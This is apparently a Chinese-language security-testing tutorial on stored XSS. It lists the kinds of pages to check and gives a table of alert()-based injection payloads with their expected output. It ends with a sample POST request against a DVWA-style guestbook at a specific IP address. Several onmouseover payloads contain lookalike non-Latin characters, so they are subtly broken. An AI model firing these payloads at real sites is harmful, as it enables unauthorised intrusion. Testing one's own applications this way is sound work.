1) 检测方法:
该漏洞存在于用户输入数据并将应用显示的所有关键点保存至后台的地方,典型的输入案例有:用户属性页面、购物车、文件管理、应用设置/首选项、论坛/消息公告板、博客、日志
所以可以爬取这些页面特有的标签来寻找可能存在漏洞的页面
2) 测试用例:
与反射型类似
注入 | 返回 |
%3E%22%27%3E%3Cscript%3Ealert%289776%29%3C%2Fscript%3E | <script>alert(9776)</script> |
<script>alert(1214)</script> | <script>alert(1214)</script> |
;</script><script>alert(1350)</script> | <script>alert(1350)</script> |
%3Cscript%3Ealert%28514%29%3C%2Fscript%3E | <script>alert(514)</script> |
"/><script>alert(10364)</script> | <script>alert(10364)</script> |
";</script><script>alert(1300)</script> | <script>alert(1300)</script> |
%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%286431%29%3C%2Fscript%3E | <script>alert(6431)</script> |
%22onmouseover%3D%22alert%281101%29%22 | οnmοuseοver="alert(1101)" |
%22%20οnmοuseοver=%22alert%283870%29%22%20 | οnmοuseοver="alert(3870)" |
-->";</script><script>alert(6837)</script> | <script>alert(6837)</script> |
;;"";;alert(3868);; | alert(3868) |
--%3E%3C/script%3E%3Cscript%3Ealert(3880)%3C/script%3E | <script>alert(3880)</script> |
%00--%3E%3C/script%3E%3Cscript%3Ealert(3882)%3C/script%3E | <script>alert(3882)</script> |
%3Cscript%3Ealert(3884)%3C/script%3E | <script>alert(3884)</script> |
%3cimg%20src%3d%22javascript%3aalert(3888)%22%3e | alert(3888) |
%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E | <script>alert(3907)</script> |
<script>alert(String.fromCharCode(88,83,83))</script> | <script>alert(String.fromCharCode(88,83,83))</script> |
3) 示例:
在post内容中的参数mtxMessage修改为</script>alert(111)</script>
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 43.247.91.228:81
User-Agent: Mozilla/5.0 (Windows NT 6.1;Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:http://43.247.91.228:81/vulnerabilities/xss_s/
Content-Type:application/x-www-form-urlencoded
Content-Length: 92
Cookie: PHPSESSID=phlno42v5ti29eu303o206lp63;security=low
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
txtName=test1&mtxMessage=</script>alert(111)</script>&btnSign=Sign+Guestbook
返回页面代码中含有</script>alert(111)</script>